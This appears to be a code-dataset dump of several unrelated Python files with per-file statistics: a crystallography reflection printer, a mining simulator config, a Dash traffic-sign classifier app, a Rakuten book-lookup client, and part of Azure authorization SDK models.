profile_fit_keys = ("miller_index", "d")
centroid_keys = (
"miller_index",
"d",
"xyzcal.mm",
"xyzcal.px",
"xyzobs.mm.value",
"xyzobs.mm.variance",
"xyzobs.px.value",
"xyzobs.px.variance",
)
keys_to_print = OrderedSet()
if show_intensities:
for k in intensity_keys:
keys_to_print.add(k)
if show_profile_fit:
for k in profile_fit_keys:
keys_to_print.add(k)
if show_centroids:
for k in centroid_keys:
keys_to_print.add(k)
if show_all_reflection_data:
for k in formats:
keys_to_print.add(k)
def format_column(key, data, format_strings=None):
if isinstance(data, flex.vec3_double):
c_strings = [
c.as_string(format_strings[i].strip())
for i, c in enumerate(data.parts())
]
elif isinstance(data, flex.miller_index):
c_strings = [
c.as_string(format_strings[i].strip())
for i, c in enumerate(data.as_vec3_double().parts())
]
elif isinstance(data, flex.size_t):
c_strings = [data.as_int().as_string(format_strings[0].strip())]
elif isinstance(data, flex.shoebox):
x1, x2, y1, y2, z1, z2 = data.bounding_boxes().parts()
bbox_sizes = ((z2 - z1) * (y2 - y1) * (x2 - x1)).as_double()
c_strings = [bbox_sizes.as_string(format_strings[0].strip())]
key += " (N pix)"
else:
c_strings = [data.as_string(format_strings[0].strip())]
column = flex.std_string()
max_element_lengths = [c.max_element_length() for c in c_strings]
for i in range(len(c_strings[0])):
column.append(
f"%{len(key)}s"
% ", ".join(
("%%%is" % max_element_lengths[j]) % c_strings[j][i]
for j in range(len(c_strings))
)
)
return column
if keys_to_print:
keys = [k for k in keys_to_print if k in rlist]
if max_reflections is not None:
max_reflections = min(len(rlist), max_reflections)
else:
max_reflections = len(rlist)
columns = []
for k in keys:
columns.append(
format_column(k, rlist[k], format_strings=formats[k].split(","))
)
text.append("")
text.append("Printing %i of %i reflections:" % (max_reflections, len(rlist)))
line = []
for j in range(len(columns)):
key = keys[j]
if key == "shoebox":
key += " (N pix)"
width = max(len(key), columns[j].max_element_length())
line.append("%%%is" % width % key)
text.append(" ".join(line))
for i in range(max_reflections):
line = (c[i] for c in columns)
text.append(" ".join(line))
return "\n".join(text)
if __name__ == "__main__":
run()
| 32.992764
| 88
| 0.530485
| 2,690
| 22,798
| 4.302974
| 0.141636
| 0.025054
| 0.018056
| 0.019698
| 0.259698
| 0.173823
| 0.1073
| 0.068683
| 0.040432
| 0.036112
| 0
| 0.01114
| 0.342442
| 22,798
| 690
| 89
| 33.04058
| 0.76099
| 0.0411
| 0
| 0.134191
| 0
| 0.001838
| 0.13467
| 0.023847
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022059
| false
| 0
| 0.025735
| 0
| 0.071691
| 0.027574
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86a477c71ec5eb0f689387ca230eaa223627c82b
| 8,749
|
py
|
Python
|
app/config/env_jesa.py
|
OuissalTAIM/jenkins
|
7ea5bcdeb6c0bb3cc14c2826a68e4f521de163c1
|
[
"BSD-1-Clause"
] | null | null | null |
app/config/env_jesa.py
|
OuissalTAIM/jenkins
|
7ea5bcdeb6c0bb3cc14c2826a68e4f521de163c1
|
[
"BSD-1-Clause"
] | 6
|
2021-02-02T22:52:41.000Z
|
2022-03-12T00:37:30.000Z
|
app/config/env_jesa.py
|
OuissalTAIM/jenkins
|
7ea5bcdeb6c0bb3cc14c2826a68e4f521de163c1
|
[
"BSD-1-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from enum import Enum, IntEnum, unique
import os
APP_NAME = "mine2farm"
NETWORK_NAME = "CenterAxis"
LOG_LEVEL_CONSOLE = "WARNING"
LOG_LEVEL_FILE = "INFO"
APP_FOLDER = os.getenv("JESA_MINE2FARM_HOME", "C:/GitRepos/mine2farm/")
LOG_FOLDER = APP_FOLDER + "app/log/"
LOG_FILE = "%(asctime)_" + APP_NAME + ".log"
OUTPUT_FOLDER = "%s%s" % (APP_FOLDER, "outputs/")
CANVAS_URL = "http://127.0.0.1/canvas.xlsm"
# DB
DB_NAME = None
DB_HOST = "172.29.161.208"
DB_PORT = 5006
DATA_SERVICE_ADD = "172.29.161.208"
DATA_SERVICE_PORT = 5001
# Results
DB_RESULT_NAME = "%s_results" % DB_NAME if DB_NAME is not None else None
DB_DETAILED_RESULT_COLLECTION_NAME = "detailed"
DB_GLOBAL_RESULT_COLLECTION_NAME = "global"
DB_GLOBAL_BEST_RESULT_COLLECTION_NAME = "global_best"
DB_DETAILED_BEST_RESULT_COLLECTION_NAME = "detailed_best"
DB_SENSITIVITY_COLLECTION_NAME = "sensitivity"
RESULT_BATCHES_SIZE = 25
HEAD_DATA_BITS = 17
DB_NAME_BITS = 20
RANDOMIZE_RESULTS = False
# RabbitMQ
RABBITMQ_SERVER = "localhost"
RABBITMQ_SIMULATOR_QUEUE_NAME = "SIMULATE"
RABBITMQ_CYCLE = 3
RABBITMQ_DETAILED_RESULT_QUEUE_NAME = "SAVE_DETAIL"
RABBITMQ_GLOBAL_RESULT_QUEUE_NAME = "SAVE_GLOBAL"
RABBITMQ_MAX_WORKER = RABBITMQ_CYCLE
RABBITMQ_PATH = "C:\\Program Files\\RabbitMQ Server\\rabbitmq_server-3.8.1\\sbin"
# Memcached
MEMCACHED_SERVER = 'localhost'
MEMCACHED_PORT = 11211
# Dashboard
DB_LOAD_FROM_SERVICE = True
# Monitoring
MONITORING_APP_NAME = "mine2farm_monitor"
MONITORING_SERVER = "172.29.161.208"
MONITORING_PORT = 5002
MONITORING_DB_NAME = "task_history"
MONITORING_COLLECTION_HISTORY_NAME = "task"
MONITORING_COLLECTION_HISTORY_BEST_NAME = "best_scenarios_history"
MONITORING_STEP = 1
MONITORING_NB_PAGE = 10
# Mongodb-bi
MONGODB_BI_PATH = "C:\\Program Files\\MongoDB\\Connector for BI\\2.13\\bin"
# Mongodb
MONGO_SERVER_PATH = "C:\\Program Files\\MongoDB\\Server\\4.0\\bin"
# params
LOGISTICS_LP = False
MODE_DEBUG = False
GRANUL_RELAX = False
class HTML_STATUS(IntEnum):
ERROR = -1
OK = 0
# Model
MONIKER_SEPARATOR = "/"
WACC = 0.1
T0 = 2020
TMAX = 2031
class PriceParams(Enum):
WACC = 0
TENOR = 1
VOLUME = 2
class PipelineType(Enum):
COMMON = 0
PRODUCER = 1
TRANSPORT = 2
BALANCE = 3
PRICE = 4
SALES = 5
@unique
class PipelineLayer(IntEnum):
UNDEFINED = -1
MINE = 0
BENEFICIATION = 1
SAP = 2
PAP = 3
GRANULATION = 4
LOGISTICS = 5
RAW_MATERIALS = 8
COMMON = 9
SALES_PLAN = 10
MINE_BENEFICIATION = 11
UNIT_CONVERSION_MATRIX = 12
PIPELINE_SCHEMA = {
PipelineLayer.COMMON: {
"type": PipelineType.COMMON,
"dico": ["location", "opex", "unit", "currency", "output", "names", "products"]
},
PipelineLayer.MINE: {
"type": PipelineType.PRODUCER,
"dico": ["mine.name", "mine.extraction", "mine.quality", "mine.capex"],
"options": "mining_options",
"production": "mining_specific_production",
"opex": "mining_opex___specific_consumptions",
"capex": "mining_capex",
"priority_mines": "prioritymines"
},
PipelineLayer.BENEFICIATION: {
"type": PipelineType.PRODUCER,
"dico": ["beneficiation.name", "beneficitation.process", "beneficitation.quality", "beneficitation.capex"],
"options": "beneficiation_options",
"production": "beneficiation_production",
"opex": "beneficiation_opex___specific_consumptions",
"capex": "beneficiation_capex"
},
PipelineLayer.SAP: {
"type": PipelineType.PRODUCER,
"dico": ["sap.name", "sap.process", "sap.product", "sap.capex", "sap.capacity[kt]"],
"options": "sap___power_plant_options",
"production": "sap___power_plant_production",
"opex": "sap___power_plant_opex___specific_consumptions",
"capex": "sap___power_plant_capex",
"product_type": "sap.product"
},
PipelineLayer.PAP: {
"type": PipelineType.PRODUCER,
"dico": ["pap.name", "pap.process", "pap.product", "pap.capex", "pap.size[kt]", "pap.input"],
"options": "pap_options",
"production": "pap_production",
"opex": "pap_opex___specific_consumptions",
"capex": "pap_capex",
"product_type": "pap.product"
},
PipelineLayer.GRANULATION: {
"type": PipelineType.PRODUCER,
"dico": ["granulation.name", "granulation.process", "granulation.product", "granulation.capex", "granulation.input"],
"options": "granulation_options",
"production": "granulation_production",
"opex": "granulation_opex",
"capex": "granulation_capex"
},
PipelineLayer.LOGISTICS: {
"type": PipelineType.TRANSPORT,
"dico": ["logistics.name", "logistics.process", "logistics.product", "logistics.capex"],
"options": "logistics_options",
"production": None,
"opex": "logistics_opex",
"capex": "logistics_capex"
},
PipelineLayer.RAW_MATERIALS: {
"type": PipelineType.PRICE,
"data": "raw_materials"
},
PipelineLayer.SALES_PLAN: {
"type": PipelineType.SALES,
"data": "sales_plan"
},
PipelineLayer.UNIT_CONVERSION_MATRIX: {
"type": PipelineType.COMMON,
"data": "conv_matrix"
},
}
SUPPLY_CHAIN = "mine2port"
DEPARTURE_ARRIVAL = {SUPPLY_CHAIN: (PipelineLayer.MINE),
"sap2pap": (PipelineLayer.SAP, PipelineLayer.PAP)}
COMBO_NODES = {
PipelineLayer.MINE_BENEFICIATION: {
"url": "mining_wp_connections",
"upstream_layer": PipelineLayer.MINE,
"downstream_layer": PipelineLayer.BENEFICIATION
}
}
COMBO_NODES_SEPARATION = "--"
class FunctionType(Enum):
COST_PV = 0
CASH_COST = 1
FULL_COST = 2
class ScenarioGeneratorType(IntEnum):
FROM_PATHS = 0
FROM_OPTIONS = 1
SPECIFIC_SCENARIOS = 2
SCENARIO_GEN_TYPE = ScenarioGeneratorType.FROM_OPTIONS
PIPELINE_METADATA = {
PipelineLayer.MINE: {
"type": PipelineType.PRODUCER,
"production": ["Name", "Extraction", "Quality", "Unit"],
"opex": ["Name", "Extraction", "Capacity", "Item", "Unit"],
"capex": ["Name", "Extraction", "Capacity", "Item", "Unit", "CAPEX"]
},
PipelineLayer.BENEFICIATION: {
"type": PipelineType.PRODUCER,
"production": ["Process", "InputQuality", "OutputQuality", "Humidity", "Unit"],
"opex": ["Process", "InputQuality", "OutputQuality", "Item", "Unit"],
"capex": ["Name", "Process", "Capacity", "Item", "Unit", "CAPEX"]
},
PipelineLayer.SAP: {
"type": PipelineType.PRODUCER,
"production": ["Location", "Process", "Product", "Unit"],
"opex": ["Location", "Process", "Item", "Unit"],
"capex": ["Location", "Process", "Capacity", "Item", "Unit", "CAPEX"]
},
PipelineLayer.PAP: {
"type": PipelineType.PRODUCER,
"production": ["Process", "Input", "Product", "Unit"],
"opex": ["Location", "Process", "Capacity", "Input", "Item", "Product", "Unit"],
"capex": ["Location", "Process", "Capacity", "Item", "Unit", "CAPEX"]
},
PipelineLayer.GRANULATION: {
"type": PipelineType.PRODUCER,
"production": ["Process", "Input", "Product", "Unit"],
"opex": ["Location", "ProductionSite", "Process", "Capacity", "Product", "Item", "Unit"],
"capex": ["Location", "ProductionSite", "Product", "Process", "Capacity", "Item", "Unit", "CAPEX"]
},
PipelineLayer.LOGISTICS: {
"type": PipelineType.TRANSPORT,
"opex": ["Upstream", "Downstream", "Method", "Product", "Capacity", "Item", "Unit"],
"capex": ["Upstream", "Downstream", "Method", "Product", "Capacity", "Item", "Unit", "CAPEX"]
},
PipelineLayer.RAW_MATERIALS: {
"type": PipelineType.PRICE,
"columns": ["Item", "Unit"]
},
PipelineLayer.SALES_PLAN: {
"type": PipelineType.PRICE,
"columns": ["Type", "Product", "Unit"]
},
PipelineLayer.UNIT_CONVERSION_MATRIX: {
"type": PipelineType.COMMON,
"columns": ["Initial Unit", "Uniform Unit", "Conversion Rate"]
},
}
class ShuffleLevel(IntEnum):
UNDEFINED = 0
SHUFFLE_WITHOUT_PERM = 1
SHUFFLE_WITH_PERMUTATIONS = 2
SHUFFLE_WITH_PERMUTATIONS_WITH_FILTERS = 3
SHUFFLE_WITH_UNNAMED = 4
SHUFFLE_LEVELS = {
PipelineLayer.MINE: ShuffleLevel.UNDEFINED,
PipelineLayer.BENEFICIATION: ShuffleLevel.UNDEFINED,
PipelineLayer.SAP: ShuffleLevel.SHUFFLE_WITH_UNNAMED,
PipelineLayer.PAP: ShuffleLevel.SHUFFLE_WITH_UNNAMED,
PipelineLayer.GRANULATION: ShuffleLevel.UNDEFINED,
PipelineLayer.LOGISTICS: ShuffleLevel.UNDEFINED,
PipelineLayer.MINE_BENEFICIATION: ShuffleLevel.UNDEFINED
}
| 29.758503
| 125
| 0.65356
| 896
| 8,749
| 6.129464
| 0.25558
| 0.055353
| 0.026038
| 0.03059
| 0.259104
| 0.159323
| 0.102877
| 0.065186
| 0.046249
| 0.025127
| 0
| 0.018384
| 0.197965
| 8,749
| 294
| 126
| 29.758503
| 0.764287
| 0.011887
| 0
| 0.17094
| 0
| 0
| 0.312833
| 0.060806
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.008547
| 0
| 0.183761
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86a5619ddeca5e16cc4b5d0ebb8500be1708f077
| 6,001
|
py
|
Python
|
app/app.py
|
Moustique-bot/hands-on-2021
|
fd023f0a431f72ef2c48e3a469be42e2de9e2957
|
[
"MIT"
] | null | null | null |
app/app.py
|
Moustique-bot/hands-on-2021
|
fd023f0a431f72ef2c48e3a469be42e2de9e2957
|
[
"MIT"
] | null | null | null |
app/app.py
|
Moustique-bot/hands-on-2021
|
fd023f0a431f72ef2c48e3a469be42e2de9e2957
|
[
"MIT"
] | null | null | null |
import base64
import io
import dash
import dash_core_components as dcc
import dash_html_components as html
import dash_bootstrap_components as dbc
from dash.dependencies import Input, Output
import numpy as np
import tensorflow as tf
from PIL import Image
from constants import CLASSES
import yaml
with open('app.yaml') as yaml_data :
params = yaml.safe_load(yaml_data)
IMAGE_WIDTH = params['IMAGE_WIDTH']
IMAGE_HEIGHT = params['IMAGE_HEIGHT']
PATH_MODEL = params['PATH_MODEL']
# Load DNN model
classifier = tf.keras.models.load_model(PATH_MODEL)
def classify_image(image, model, image_box=None):
"""Classify image by model
Parameters
----------
content: image content
model: tf/keras classifier
Returns
-------
class id returned by model classifier
"""
images_list = []
image = image.resize((IMAGE_WIDTH, IMAGE_HEIGHT), box=image_box)
# box argument clips image to (x1, y1, x2, y2)
image = np.array(image)
images_list.append(image)
return model.predict_classes(np.array(images_list))
app = dash.Dash('Traffic Signs Recognition', external_stylesheets=[dbc.themes.BOOTSTRAP])
pre_style = {
'whiteSpace': 'pre-wrap',
'wordBreak': 'break-all',
'whiteSpace': 'normal'
}
# Define application layout
navbar = dbc.NavbarSimple(
children=[
dbc.DropdownMenu(
children=[
dbc.DropdownMenuItem('Réseau de Neurones', header=True),
dbc.DropdownMenuItem('SVM', href="#"),
],
nav=True,
in_navbar=True,
label='Modèle',
),
],
brand="Menu",
brand_href="#",
color= "#d90054",
dark=True
)
cards = html.Div(
[
dbc.Card(
dbc.CardBody(
[
html.H5("Présentation", className="card-title"),
html.P(
[
'Cette application à pour but de réaliser des modèles capables de classer des panneaux de signalisation allemand à partir d\'une image. L\'application fonctionne de la manière suivante : vous déposer une image à l\'emplacement indiqué et la prédiction du modèle apparait immédiatement en dessous. En haut à droite vous pouvez sélectionner le modèle que vous voulez tester.',
],
className='card-text',
),
]
),
className='w-75 mb-3',
color='#f1cbd1',
outline='Black',
style={
'margin-top': '75px',
'margin-left': '185px'},
),
]
)
app.layout = html.Div([
html.Div([navbar]),
html.Div(cards),
dcc.Upload(
id='bouton-chargement',
children=html.Div([
'Cliquer-déposer ou ',
html.A('sélectionner une image')
]),
style={
'width': '50%',
'height': '60px',
'lineHeight': '60px',
'borderWidth': '1px',
'borderStyle': 'dashed',
'borderRadius': '5px',
'textAlign': 'center',
'margin-top': '75px',
'margin-left': '370px',
}
),
html.Div(id='mon-image'),
html.Div(id='ma-zone-resultat')
])
@app.callback(Output('mon-image', 'children'),
[Input('bouton-chargement', 'contents')])
def update_output(contents):
if contents is not None:
content_type, content_string = contents.split(',')
if 'image' in content_type:
image = Image.open(io.BytesIO(base64.b64decode(content_string)))
predicted_class = classify_image(image, classifier)[0]
return html.Div([
html.Hr(style={'margin-top': '75px'}),
html.Img(src=contents, style={'margin-left': '750px'}),
html.H4('Classe prédite : {}'.format(CLASSES[predicted_class]), style={'textAlign': 'center'}),
html.Hr(),
#html.Div('Raw Content'),
#html.Pre(contents, style=pre_style)
])
else:
try:
# Décodage de l'image transmise en base 64 (cas des fichiers ppm)
# fichier base 64 --> image PIL
image = Image.open(io.BytesIO(base64.b64decode(content_string)))
# image PIL --> conversion PNG --> buffer mémoire
buffer = io.BytesIO()
image.save(buffer, format='PNG')
# buffer mémoire --> image base 64
buffer.seek(0)
img_bytes = buffer.read()
content_string = base64.b64encode(img_bytes).decode('ascii')
# Appel du modèle de classification
predicted_class = classify_image(image, classifier)[0]
# Affichage de l'image
return html.Div([
html.Hr(style={'margin-top': '75px'}),
html.Img(src='data:image/png;base64,' + content_string, style={'margin-left': '750px'}),
html.H4('Classe prédite : {}'.format(CLASSES[predicted_class]), style={'textAlign': 'center'}),
html.Hr(),
])
except:
return html.Div([
html.Hr(),
html.Div('Uniquement des images svp : {}'.format(content_type)),
html.Hr(),
html.Div('Raw Content'),
html.Pre(contents, style=pre_style)
])
# Manage interactions with callbacks
@app.callback(
Output(component_id='ma-zone-resultat', component_property='children'),
[Input(component_id='mon-champ-texte', component_property='value')]
)
def update_output_div(input_value):
return html.H3('Valeur saisie ici "{}"'.format(input_value))
# Start the application
if __name__ == '__main__':
app.run_server(debug=True)
| 31.920213
| 402
| 0.551408
| 635
| 6,001
| 5.107087
| 0.398425
| 0.02806
| 0.016035
| 0.016651
| 0.19334
| 0.173296
| 0.173296
| 0.146778
| 0.146778
| 0.115325
| 0
| 0.017514
| 0.324446
| 6,001
| 188
| 403
| 31.920213
| 0.782437
| 0.097484
| 0
| 0.23741
| 0
| 0.007194
| 0.179301
| 0.004088
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021583
| false
| 0
| 0.086331
| 0.007194
| 0.143885
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86a57ddfcf5854e170f6cff9e4deb86cb8f9d464
| 1,214
|
py
|
Python
|
books/rakutenapi.py
|
NobukoYano/LibraryApp
|
623f60614f15ab760e1c0d2f18954ce948f2d2a3
|
[
"MIT"
] | 1
|
2019-04-27T11:18:42.000Z
|
2019-04-27T11:18:42.000Z
|
books/rakutenapi.py
|
NobukoYano/LibrayApp
|
623f60614f15ab760e1c0d2f18954ce948f2d2a3
|
[
"MIT"
] | 11
|
2020-02-12T00:11:23.000Z
|
2022-02-10T07:59:24.000Z
|
books/rakutenapi.py
|
NobukoYano/LibrayApp
|
623f60614f15ab760e1c0d2f18954ce948f2d2a3
|
[
"MIT"
] | null | null | null |
import json
import requests
from django.conf import settings
class rakuten:
def get_json(self, isbn: str) -> dict:
appid = settings.RAKUTEN_APP_ID
# API request template
api = "https://app.rakuten.co.jp/services/api/BooksTotal/"\
"Search/20170404?format=json&isbnjan={isbnjan}&"\
"applicationId={appid}"
# format get api URL
url = api.format(isbnjan=isbn, appid=appid)
# execute
r = requests.get(url)
# decode to json
# Check the status code
status_code = r.status_code
if status_code != 200:
# if failed
return None
data = json.loads(r.text)
if data['count'] == 0:
return None
json_data = {}
json_data['isbn'] = data['Items'][0]['Item']['isbn']
json_data['title'] = data['Items'][0]['Item']['title']
json_data['publisher'] = data['Items'][0]['Item']['publisherName']
json_data['pubdate'] = data['Items'][0]['Item']['salesDate']
json_data['cover'] = data['Items'][0]['Item']['largeImageUrl']
json_data['author'] = data['Items'][0]['Item']['author']
return json_data
| 27.590909
| 74
| 0.559308
| 143
| 1,214
| 4.65035
| 0.41958
| 0.096241
| 0.090226
| 0.126316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020666
| 0.282537
| 1,214
| 43
| 75
| 28.232558
| 0.742824
| 0.07743
| 0
| 0.08
| 0
| 0
| 0.2354
| 0.060198
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04
| false
| 0
| 0.12
| 0
| 0.32
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86a699aa985f4eb39369d4b317e19a2eb2706a0b
| 18,710
|
py
|
Python
|
sdk/authorization/azure-mgmt-authorization/azure/mgmt/authorization/v2018_01_01_preview/models/_models_py3.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 2,728
|
2015-01-09T10:19:32.000Z
|
2022-03-31T14:50:33.000Z
|
sdk/authorization/azure-mgmt-authorization/azure/mgmt/authorization/v2018_01_01_preview/models/_models_py3.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 17,773
|
2015-01-05T15:57:17.000Z
|
2022-03-31T23:50:25.000Z
|
sdk/authorization/azure-mgmt-authorization/azure/mgmt/authorization/v2018_01_01_preview/models/_models_py3.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 1,916
|
2015-01-19T05:05:41.000Z
|
2022-03-31T19:36:44.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, List, Optional
from azure.core.exceptions import HttpResponseError
import msrest.serialization
class ErrorAdditionalInfo(msrest.serialization.Model):
"""The resource management error additional info.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar type: The additional info type.
:vartype type: str
:ivar info: The additional info.
:vartype info: any
"""
_validation = {
'type': {'readonly': True},
'info': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'info': {'key': 'info', 'type': 'object'},
}
def __init__(
self,
**kwargs
):
super(ErrorAdditionalInfo, self).__init__(**kwargs)
self.type = None
self.info = None
class ErrorDetail(msrest.serialization.Model):
"""The error detail.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar code: The error code.
:vartype code: str
:ivar message: The error message.
:vartype message: str
:ivar target: The error target.
:vartype target: str
:ivar details: The error details.
:vartype details: list[~azure.mgmt.authorization.v2018_01_01_preview.models.ErrorDetail]
:ivar additional_info: The error additional info.
:vartype additional_info:
list[~azure.mgmt.authorization.v2018_01_01_preview.models.ErrorAdditionalInfo]
"""
_validation = {
'code': {'readonly': True},
'message': {'readonly': True},
'target': {'readonly': True},
'details': {'readonly': True},
'additional_info': {'readonly': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'},
'details': {'key': 'details', 'type': '[ErrorDetail]'},
'additional_info': {'key': 'additionalInfo', 'type': '[ErrorAdditionalInfo]'},
}
def __init__(
self,
**kwargs
):
super(ErrorDetail, self).__init__(**kwargs)
self.code = None
self.message = None
self.target = None
self.details = None
self.additional_info = None
class ErrorResponse(msrest.serialization.Model):
"""Common error response for all Azure Resource Manager APIs to return error details for failed operations. (This also follows the OData error response format.).
:param error: The error object.
:type error: ~azure.mgmt.authorization.v2018_01_01_preview.models.ErrorDetail
"""
_attribute_map = {
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
*,
error: Optional["ErrorDetail"] = None,
**kwargs
):
super(ErrorResponse, self).__init__(**kwargs)
self.error = error
class Permission(msrest.serialization.Model):
"""Role definition permissions.
:param actions: Allowed actions.
:type actions: list[str]
:param not_actions: Denied actions.
:type not_actions: list[str]
:param data_actions: Allowed Data actions.
:type data_actions: list[str]
:param not_data_actions: Denied Data actions.
:type not_data_actions: list[str]
"""
_attribute_map = {
'actions': {'key': 'actions', 'type': '[str]'},
'not_actions': {'key': 'notActions', 'type': '[str]'},
'data_actions': {'key': 'dataActions', 'type': '[str]'},
'not_data_actions': {'key': 'notDataActions', 'type': '[str]'},
}
def __init__(
self,
*,
actions: Optional[List[str]] = None,
not_actions: Optional[List[str]] = None,
data_actions: Optional[List[str]] = None,
not_data_actions: Optional[List[str]] = None,
**kwargs
):
super(Permission, self).__init__(**kwargs)
self.actions = actions
self.not_actions = not_actions
self.data_actions = data_actions
self.not_data_actions = not_data_actions
class PermissionGetResult(msrest.serialization.Model):
"""Permissions information.
:param value: An array of permissions.
:type value: list[~azure.mgmt.authorization.v2018_01_01_preview.models.Permission]
:param next_link: The URL to use for getting the next set of results.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[Permission]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["Permission"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(PermissionGetResult, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
class ProviderOperation(msrest.serialization.Model):
"""Operation.
:param name: The operation name.
:type name: str
:param display_name: The operation display name.
:type display_name: str
:param description: The operation description.
:type description: str
:param origin: The operation origin.
:type origin: str
:param properties: The operation properties.
:type properties: any
:param is_data_action: The dataAction flag to specify the operation type.
:type is_data_action: bool
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'origin': {'key': 'origin', 'type': 'str'},
'properties': {'key': 'properties', 'type': 'object'},
'is_data_action': {'key': 'isDataAction', 'type': 'bool'},
}
def __init__(
self,
*,
name: Optional[str] = None,
display_name: Optional[str] = None,
description: Optional[str] = None,
origin: Optional[str] = None,
properties: Optional[Any] = None,
is_data_action: Optional[bool] = None,
**kwargs
):
super(ProviderOperation, self).__init__(**kwargs)
self.name = name
self.display_name = display_name
self.description = description
self.origin = origin
self.properties = properties
self.is_data_action = is_data_action
class ProviderOperationsMetadata(msrest.serialization.Model):
"""Provider Operations metadata.
:param id: The provider id.
:type id: str
:param name: The provider name.
:type name: str
:param type: The provider type.
:type type: str
:param display_name: The provider display name.
:type display_name: str
:param resource_types: The provider resource types.
:type resource_types: list[~azure.mgmt.authorization.v2018_01_01_preview.models.ResourceType]
:param operations: The provider operations.
:type operations: list[~azure.mgmt.authorization.v2018_01_01_preview.models.ProviderOperation]
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'resource_types': {'key': 'resourceTypes', 'type': '[ResourceType]'},
'operations': {'key': 'operations', 'type': '[ProviderOperation]'},
}
def __init__(
self,
*,
id: Optional[str] = None,
name: Optional[str] = None,
type: Optional[str] = None,
display_name: Optional[str] = None,
resource_types: Optional[List["ResourceType"]] = None,
operations: Optional[List["ProviderOperation"]] = None,
**kwargs
):
super(ProviderOperationsMetadata, self).__init__(**kwargs)
self.id = id
self.name = name
self.type = type
self.display_name = display_name
self.resource_types = resource_types
self.operations = operations
class ProviderOperationsMetadataListResult(msrest.serialization.Model):
"""Provider operations metadata list.
:param value: The list of providers.
:type value:
list[~azure.mgmt.authorization.v2018_01_01_preview.models.ProviderOperationsMetadata]
:param next_link: The URL to use for getting the next set of results.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[ProviderOperationsMetadata]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["ProviderOperationsMetadata"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(ProviderOperationsMetadataListResult, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
class ResourceType(msrest.serialization.Model):
"""Resource Type.
:param name: The resource type name.
:type name: str
:param display_name: The resource type display name.
:type display_name: str
:param operations: The resource type operations.
:type operations: list[~azure.mgmt.authorization.v2018_01_01_preview.models.ProviderOperation]
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'operations': {'key': 'operations', 'type': '[ProviderOperation]'},
}
def __init__(
self,
*,
name: Optional[str] = None,
display_name: Optional[str] = None,
operations: Optional[List["ProviderOperation"]] = None,
**kwargs
):
super(ResourceType, self).__init__(**kwargs)
self.name = name
self.display_name = display_name
self.operations = operations
class RoleAssignment(msrest.serialization.Model):
"""Role Assignments.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: The role assignment ID.
:vartype id: str
:ivar name: The role assignment name.
:vartype name: str
:ivar type: The role assignment type.
:vartype type: str
:param scope: The role assignment scope.
:type scope: str
:param role_definition_id: The role definition ID.
:type role_definition_id: str
:param principal_id: The principal ID.
:type principal_id: str
:param can_delegate: The Delegation flag for the role assignment.
:type can_delegate: bool
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
